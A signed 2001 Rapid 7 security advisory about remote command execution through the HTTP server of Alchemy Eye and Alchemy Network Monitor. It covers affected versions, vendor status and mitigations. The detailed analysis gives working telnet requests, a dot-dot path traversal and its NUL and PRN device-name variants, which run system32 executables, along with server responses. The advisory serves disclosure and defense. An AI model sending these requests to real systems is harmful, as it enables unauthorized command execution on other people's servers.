-----BEGIN PGP SIGNED MESSAGE-----
_______________________________________________________________________
Rapid 7, Inc. Security Advisory
Visit http://www.rapid7.com to download NeXpose(tm), our
advanced vulnerability scanner. Linux and Windows 2000
versions are available now!
_______________________________________________________________________
Rapid 7 Advisory R7-0001: Alchemy Eye HTTP Remote Command Execution
Published: November 29, 2001
Revision: 1.0
CVE ID: CAN-2001-0871
Bugtraq ID: 3599
1. Affected system(s):
KNOWN VULNERABLE:
o Alchemy Eye and Alchemy Network Monitor v2.0 through v2.6.18
(vulnerable to first variant, see below)
o Alchemy Eye and Alchemy Network Monitor v2.6.19 through v3.0.10
(vulnerable to second variant, see below)
Apparently NOT VULNERABLE:
o Alchemy Eye v1.7 (has no web access feature)
o Alchemy Eye v1.8 (has no web access feature)
2. Summary
Alchemy Eye and Alchemy Network Monitor are network management
tools for Microsoft Windows. The product contains a built-in HTTP
server for remote monitoring and control. This HTTP server allows
arbitrary commands to be run on the server by a remote
attacker.
The Common Vulnerabilities and Exposures (CVE) project has assigned
the identifier CAN-2001-0871 to this issue. This is a candidate for
inclusion in the CVE list (http://cve.mitre.org), which standardizes
names for security problems.
Bugtraq has assigned the identifier 3599 to this vulnerability.
More information on Bugtraq can be found at http://www.securityfocus.com
3. Vendor status and information
Alchemy Eye
Alchemy Labs, Inc.
http://www.alchemy-lab.com/products/eye/
Alchemy Network Monitor
DEK Software, Inc.
http://www.deksoftware.com/alchemy/
Vendors notified 7/25/2001. Initial problem fixed shortly thereafter
but subsequent releases (up to and including the current release,
v3.0.10) are still vulnerable to a variant of the same attack.
Vendor is aware of the problems but has stopped responding to
our emails.
4. Solution
The current version of the product is VULNERABLE. Future versions may
also be vulnerable. If you are using any of the vulnerable versions,
we suggest the following:
(a) Disable HTTP access completely via Preferences. You must
restart the product for this to take effect.
or, (b) Require HTTP authentication via Preferences. You must
restart the product for this to take effect. This is only possible
with versions 2.6.x and later (earlier versions have no
authentication option).
(c) Create a very restricted user account and run the product under
those credentials.
5. Detailed analysis
Versions 2.x through 2.6 are vulnerable to arbitrary remote command
execution by using a simple dotdot traversal.
$ telnet localhost 80
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
GET /cgi-bin/../../../../WINNT/system32/ipconfig.exe HTTP/1.0
HTTP/1.0 200 OK
Date: Thu, 29 Nov 2001 18:20:00 GMT
Server: Alchemy Eye/2.0.20
MIME-version: 1.0
Content-Type: text/html
Location: /cgi-bin/../../../../WINNT/system32/ipconfig.exe
Content-Length: 275
Windows 2000 IP Configuration
Ethernet adapter Cable:
Connection-specific DNS Suffix . : foo.bar.com
IP Address. . . . . . . . . . . . : 192.168.0.2
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.0.1
Later patched 2.6 revisions are not vulnerable to the simple dotdot
traversal:
$ telnet localhost 80
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
GET /cgi-bin/../../../../WINNT/system32/ipconfig.exe HTTP/1.0
HTTP/1.0 403 Forbidden
Server: Alchemy Eye/2.6.16
MIME-version: 1.0
Content-Type: text/plain
Location: /cgi-bin/../../../../WINNT/system32/ipconfig.exe
Content-Length: 9
Forbidden
However, these versions are vulnerable to a variant that combines
dotdot traversal with the special Windows device name "NUL":
$ telnet localhost 80
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
GET /cgi-bin/NUL/../../../../WINNT/system32/ipconfig.exe HTTP/1.0
HTTP/1.0 200 OK
Server: Alchemy Eye/2.6.16
MIME-version: 1.0
Content-Type: text/html
Location: /cgi-bin/NUL/../../../../WINNT/system32/ipconfig.exe
Content-Length: 275
Windows 2000 IP Configuration
Ethernet adapter Cable:
Connection-specific DNS Suffix . : foo.bar.com
IP Address. . . . . . . . . . . . : 192.168.0.2
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.0.1
Versions 2.7.x and above address the "NUL" issue but are still vulnerable
if you use a device name other than "NUL", e.g. "PRN":
$ telnet localhost 80
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
GET /cgi-bin/PRN/../../../../WINNT/system32/ipconfig.exe HTTP/1.0
HTTP/1.0 200 OK
Server: Alchemy Eye/3.0.10
MIME-version: 1.0
Content-Type: text/html
Location: /cgi-bin/PRN/../../../../WINNT/system32/ipconfig.exe
Content-Length: 275
Windows 2000 IP Configuration
Ethernet adapter Cable:
Connection-specific DNS Suffix . : foo.bar.com
IP Address. . . . . . . . . . . . : 192.168.0.2
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.0.1
The attacker can not run commands with arguments because
the HTTP server does not handle URL-encoded spaces (%20),
nor does it handle actual spaces.
6. Contact Information
Rapid 7 Security Advisories
Email: advisory@rapid7.com
Web: http://www.rapid7.com
Phone: +1 (212) 558-8700
7. Disclaimer and Copyright
Rapid 7, Inc. is not responsible for the misuse of the information
provided in our security advisories. These advisories are a service
to the professional security community. There are NO WARRANTIES
with regard to this information. Any application or distribution of
this information constitutes acceptance AS IS, at the user's own
risk. This information is subject to change without notice.
This advisory Copyright (C) 2001 Rapid 7, Inc. Permission is
hereby granted to redistribute this advisory in electronic media
only, providing that no changes are made and that the copyright
notices and disclaimers remain intact. This advisory may not be
printed or distributed in non-electronic media without the
express written permission of Rapid 7, Inc.
-----BEGIN PGP SIGNATURE-----
Version: PGP 7.0.1
iQEVAwUBPAcMn+stPa8cHEsJAQEZUQgAwPeHJLOusOnIN88hFPOX56efWkcliduK
aetWtYbPLzNKhgSxJeWEddTzZeT3i/ulwT810jQyS4nfxGlZa2JvaXMXeAwxKLXm
IMXAymCbXKdP4D/SYe5/kLUeWcnujgyYz0m3Y2qmcGDjhaizm8iWxvYUPunX6/ra
6fXTjQjjqRnB75sTx4FZYglvE4o0FFNNQmEvbPJXmF0No7X/KFaDAM4DD/R/H1IL
C6aAed9NppY2KizzO7pf3Rd3M1kJax3xC6+8hQWYplHJZN3WQ+msNlpq/2O6D5Gg
dzIi8ANkGzzrw1y4ZbYPTFvmyVE6sQTW5ShH5t69bl6iGieVtS9JIQ==
=keCq
-----END PGP SIGNATURE-----
